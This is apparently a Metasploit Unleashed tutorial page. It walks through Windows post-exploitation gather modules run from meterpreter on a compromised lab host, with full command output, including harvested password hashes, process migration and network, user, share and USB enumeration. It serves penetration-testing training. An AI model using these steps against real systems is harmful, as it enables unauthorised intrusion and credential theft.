Windows Post Gather Modules

From Metasploit Unleashed
Jump to: navigation, search


The "arp_scanner" post module will perform an ARP scan for a given range through a compromised host.

meterpreter > run post/windows/gather/arp_scanner RHOSTS=

[*] Running module against V-MAC-XP
[*] ARP Scanning
[*] 	IP: MAC b2:a8:1d:e0:68:89
[*] 	IP: MAC 0:f:b5:fc:bd:22
[*] 	IP: MAC 0:21:85:fc:96:32
[*] 	IP: MAC 78:ca:39:fe:b:4c
[*] 	IP: MAC 58:b0:35:6a:4e:cc
[*] 	IP: MAC 0:1f:d0:2e:b5:3f
[*] 	IP: MAC 58:55:ca:14:1e:61
[*] 	IP: MAC 0:1:6c:6f:dd:d1
[*] 	IP: MAC c:60:76:57:49:3f
[*] 	IP: MAC 0:c:29:c9:38:4c
[*] 	IP: MAC 12:33:a0:2:86:9b
[*] 	IP: MAC c8:bc:c8:85:9d:b2
[*] 	IP: MAC d8:30:62:8c:9:ab
[*] 	IP: MAC 8a:e9:17:42:35:b0
[*] 	IP: MAC 3e:ff:3c:4c:89:67
[*] 	IP: MAC c6:b3:a1:bc:8a:ec
[*] 	IP: MAC 1c:c1:de:41:73:94
[*] 	IP: MAC 1e:75:bd:82:9b:11
[*] 	IP: MAC 76:c4:72:53:c1:ce
[*] 	IP: MAC 0:c:29:d7:55:f
[*] 	IP: MAC 1a:dc:fa:ab:8b:b
meterpreter >


The "checkvm" post module, simply enough, checks to see if the compromised host is a virtual machine. This module supports Hyper-V, VMWare, VirtualBox, Xen, and QEMU virtual machines.

meterpreter > run post/windows/gather/checkvm 

[*] Checking if V-MAC-XP is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >


The "credential_collector" module harvests passwords hashes and tokens on the compromised host.

meterpreter > run post/windows/gather/credential_collector 

[*] Running module against V-MAC-XP
[+] Collecting hashes...
    Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714
    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287
[+] Collecting tokens...
meterpreter >


The "dumplinks" module parses the .lnk files in a users Recent Documents which could be useful for further information gathering. Note that, as shown below, we first need to migrate into a user process prior to running the module.

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1096)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1824
[*] New server process: Explorer.EXE (1824)
meterpreter > run post/windows/gather/dumplinks 

[*] Running module against V-MAC-XP
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Release.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\testmachine_crashie.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user manual.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user's guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
meterpreter >


The "enum_applications" module enumerates the applications that are installed on the compromised host.

meterpreter > run post/windows/gather/enum_applications 

[*] Enumerating applications installed on V-MAC-XP

Installed Applications

 Name                                                            Version
 ----                                                            -------
 Adobe Flash Player 10 Plugin                          
 Windows Installer 3.1 (KB893803)                                3.1
 Metasploit Framework 3.4.1                                      3.4.1
 Mozilla Firefox (3.6.16)                                        3.6.16 (en-US)
 Notepad++                                                       5.7
 Microsoft SQL Server VSS Writer                                 9.00.1399.06
 Microsoft SQL Server 2005 Express Edition (SQLEXPRESS)          9.00.1399.06
 WinPcap 4.1.1                                         
 Python 2.5                                                      2.5.150
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  9.0.30729.4148
 WebFldrs XP                                                     9.50.7523
 MSXML 6.0 Parser                                                6.00.3883.8
 ActivePerl 5.12.1 Build 1201                                    5.12.1201
 Kingview 6.53                                                   6.53
 VMware Tools                                          
 Microsoft SQL Server Native Client                              9.00.1399.06
 Microsoft SQL Server Setup Support Files (English)              9.00.1399.06
 Microsoft .NET Framework 2.0                                    2.0.50727

meterpreter >


The "enum_logged_on_users" post module returns a listing of current and recently logged on users along with their SIDs.

meterpreter > run post/windows/gather/enum_logged_on_users 

[*] Running against session 3

Current Logged Users

 SID                                          User
 ---                                          ----
 S-1-5-21-839522115-796845957-2147293891-500  V-MAC-XP\Administrator

Recently Logged Users

 SID                                          Profile Path
 ---                                          ------------
 S-1-5-18                                     %systemroot%\system32\config\systemprofile
 S-1-5-19                                     %SystemDrive%\Documents and Settings\LocalService
 S-1-5-20                                     %SystemDrive%\Documents and Settings\NetworkService
 S-1-5-21-839522115-796845957-2147293891-500  %SystemDrive%\Documents and Settings\Administrator

meterpreter >


The "enum_shares" post module returns a listing of both configured and recently used shares on the compromised system.

meterpreter > run post/windows/gather/enum_shares 

[*] Running against session 3
[*] The following shares were found:
[*] 	Name: Desktop
[*] 	Path: C:\Documents and Settings\Administrator\Desktop
[*] 	Type: 0
[*] Recent Mounts found:
[*] 	\\\software
[*] 	\\\Data
meterpreter >


The "enum_snmp" module will enumerate the SNMP service configuration on the target, if present, including the community strings.

meterpreter > run post/windows/gather/enum_snmp

[*] Running module against V-MAC-XP
[*] Checking if SNMP is Installed
[*] 	SNMP is installed!
[*] Enumerating community strings
[*] 	Comunity Strings
[*] 	================
[*] 	 Name    Type
[*] 	 ----    ----
[*] 	 public  READ ONLY
[*] Enumerating Permitted Managers for Community Strings
[*] 	Community Strings can be accessed from any host
[*] Enumerating Trap Configuration
[*] No Traps are configured
meterpreter >


The "hashdump" post module will dump the local users accounts on the compromised host using the registry.

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


meterpreter >


The "usb_history" module enumerates the USB drive history on the compromised system.

meterpreter > run post/windows/gather/usb_history 

[*] Running module against V-MAC-XP
   C:	                                                             Disk ea4cea4c 
   E:	STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   A:	FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   D:	IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

[*] Kingston DataTraveler 2.0 USB Device
   Disk lpftLastWriteTime	                    Thu Apr 21 13:09:42 -0600 2011
 Volume lpftLastWriteTime	                    Thu Apr 21 13:09:43 -0600 2011
             Manufacturer	                            (Standard disk drives)
           ParentIdPrefix	                                      8&3a01dffe&0 (   E:)
                    Class	                                         DiskDrive
                   Driver	       {4D36E967-E325-11CE-BFC1-08002BE10318}\0001

meterpreter >

Module Reference > Post Modules > Windows Post Modules > Windows Post Gather Modules